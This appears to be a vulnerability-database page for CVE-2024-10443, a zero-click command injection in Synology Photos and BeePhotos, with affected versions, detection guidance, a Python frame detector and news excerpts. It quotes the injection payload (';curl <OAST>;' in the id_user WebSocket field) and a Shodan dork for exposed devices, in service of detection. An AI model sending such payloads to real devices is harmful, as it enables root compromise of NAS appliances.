CVE-2024-10443
Published 2024-11-15
CVE-2024-10443: Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Task Manager component in Synology BeePhotos before…
Priority P184 · Severity: critical · CVSS 3.1 base score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 28.38% (97.9th percentile)
Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
Affected (8 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synology | beephotos | < 1.1.0-10053 | 1.1.0-10053 |
| synology | beephotos | < 1.0.2-10026 | 1.0.2-10026 |
| synology | beephotos | >= * < 1.1.0-10053 | 1.1.0-10053 |
| synology | beephotos | >= * < 1.0.2-10026 | 1.0.2-10026 |
| synology | photos | < 1.6.2-0720 | 1.6.2-0720 |
| synology | photos | < 1.7.0-0795 | 1.7.0-0795 |
| synology | synology_photos | >= * < 1.7.0-0795 | 1.7.0-0795 |
| synology | synology_photos | >= * < 1.6.2-0720 | 1.6.2-0720 |
Detection & IOCs (extracted from sources)
url: ws://[host]/FotoSocketIo/socket.io/?transport=websocket&EIO=4
path: /FotoSocketIo/socket.io/
command: 42["page-view",{"id_user": ";curl <OAST>;", "timestamp": 0, "location": "xxd"}]
other: shodan-query: html:"BeeStation"
- Exploit arrives as an unauthenticated WebSocket connection to /FotoSocketIo/socket.io/?transport=websocket&EIO=4; monitor for WebSocket upgrade requests to this path from untrusted sources.
- The injection is delivered inside the 'id_user' field of a 'page-view' WebSocket event (Socket.IO message type 42); alert on semicolon-delimited shell commands in that field.
- The vulnerability is zero-click and requires no authentication; any inbound WebSocket connection to the Task Manager endpoint should be treated as suspicious on unpatched devices.
- Use Shodan dork html:"BeeStation" to identify Internet-exposed vulnerable devices for proactive scanning and patching.
- Exploitation results in code execution as root; look for unexpected outbound curl/DNS requests originating from the Synology Photos or BeePhotos process after a WebSocket page-view event.
- Patches are NOT automatically applied; administrators must manually upgrade to the fixed versions to remediate the vulnerability.
- The Nuclei PoC template requires the websocket-client Python package and Python 3 to be pre-installed on the system running the scanner.
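The detection guidance above (watch the /FotoSocketIo/socket.io/ path, parse Socket.IO type-42 event frames, flag shell metacharacters in the 'id_user' field of 'page-view' events) can be turned into a small inspection routine. The following is an added example written for this page; it is not code from the page's sources or from Synology. It assumes the WebSocket frames have already been captured as text (for instance by a reverse proxy or IDS) together with the request path, and it follows the Socket.IO framing on Engine.IO 4, where '4' is an Engine.IO message packet and '2' a Socket.IO event, optionally followed by a '/namespace,' prefix and an ack id before the JSON array. All sample frames are constructed.

```python
import json
import re

# Endpoint named in the advisory extraction above.
WATCH_PATH = "/FotoSocketIo/socket.io/"

# Characters that have no place in a user identifier but do drive a shell.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")


def parse_socketio_event(frame):
    """Return (event_name, payload) for a Socket.IO EVENT frame, else None.

    Layout on Engine.IO 4: '4' (message) + '2' (event)
    + optional '/namespace,' + optional ack-id digits + JSON array.
    """
    if not frame.startswith("42"):
        return None
    body = frame[2:]
    if body.startswith("/"):            # namespace prefix, e.g. '/photos,'
        comma = body.find(",")
        if comma == -1:
            return None
        body = body[comma + 1:]
    body = body.lstrip("0123456789")    # optional ack id before the array
    try:
        arr = json.loads(body)
    except json.JSONDecodeError:
        return None
    if not isinstance(arr, list) or not arr or not isinstance(arr[0], str):
        return None
    return arr[0], (arr[1] if len(arr) > 1 else None)


def inspect_frame(path, frame):
    """Return a finding dict when a frame matches the CVE-2024-10443 pattern.

    Only 'page-view' events on the Task Manager socket path are examined,
    and only a string 'id_user' carrying shell metacharacters is reported.
    """
    if not path.startswith(WATCH_PATH):
        return None
    parsed = parse_socketio_event(frame)
    if parsed is None:
        return None
    event, payload = parsed
    if event != "page-view" or not isinstance(payload, dict):
        return None
    id_user = payload.get("id_user")
    if not isinstance(id_user, str):
        return None
    hit = SHELL_META.search(id_user)
    if hit is None:
        return None
    return {"event": event, "field": "id_user",
            "value": id_user, "metachar": hit.group(0)}


def scan(frames):
    """Run inspect_frame over (path, frame) pairs and keep the findings."""
    return [f for f in (inspect_frame(p, fr) for p, fr in frames) if f]


# Constructed sample traffic: one benign page-view, the payload shape quoted
# on this page (with the OAST host left as a placeholder), the same payload
# on an unrelated path, a namespaced/acked variant, and an Engine.IO ping.
SOCKET_PATH = "/FotoSocketIo/socket.io/?transport=websocket&EIO=4"
SAMPLE_FRAMES = [
    (SOCKET_PATH, '42["page-view",{"id_user": "1001", "timestamp": 1731600000, "location": "album"}]'),
    (SOCKET_PATH, '42["page-view",{"id_user": ";curl <OAST>;", "timestamp": 0, "location": "xxd"}]'),
    ("/other/socket.io/", '42["page-view",{"id_user": ";curl <OAST>;", "timestamp": 0, "location": "xxd"}]'),
    (SOCKET_PATH, '42/photos,7["page-view",{"id_user":"1|id","timestamp":0,"location":"x"}]'),
    (SOCKET_PATH, "2"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_FRAMES):
        print(finding)
```

The path check is deliberately a prefix match so that the query string (transport and EIO version) does not have to be normalised first, and the metacharacter set is broad on purpose: a legitimate identifier in this field is numeric, so any shell syntax is worth an alert rather than only the semicolon form quoted above.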
No detection rules found.
Nuclei
Synology BeeStation BST150-4T - Unauthenticated Command Injection (nuclei · CVSS 9.8 · CRITICAL)
Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
Template:
```yaml
id: CVE-2024-10443

info:
  name: Synology BeeStation BST150-4T - Unauthenticated Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote att
```
Check Point
4th November – Threat Intelligence Report (blogs_checkpoint · 2024-11-04)
## 4th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 4th November, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Free, the second-largest telecom company in France, has been hit by a cyberattack resulting in unauthorized access to personal data associated with certain subscriber accounts. The incident surfaced following an attempted sale of stolen customer data on a cybercrime forum, impacting potentially up to 19 million customers.
BleepingComputer
Synology hurries out patches for zero-days exploited at Pwn2Own (blogs_bleepingcomputer · 2024-11-01 · CVSS 9.8 · CRITICAL)
## Synology hurries out patches for zero-days exploited at Pwn2Own
By Sergiu Gatlan
Synology, a Taiwanese network-attached storage (NAS) appliance maker, patched two critical zero-days exploited during last week's Pwn2Own hacking competition within days.
Midnight Blue security researcher Rick de Jager found the critical zero-click vulnerabilities (tracked together as CVE-2024-10443 and dubbed RISK:STATION) in the company's Synology Photos and BeePhotos for BeeStation software.
As Synology explains in security advisories published two days after the flaws were demoed at Pwn2Own Ireland 2024 to hijack a Synology BeeStation BST150-4T device, the security flaws enable remote attackers to gain remote code execution as root on vulnerable NAS appliances exposed online.
"The vulnerability wa
Published: 2024-11-15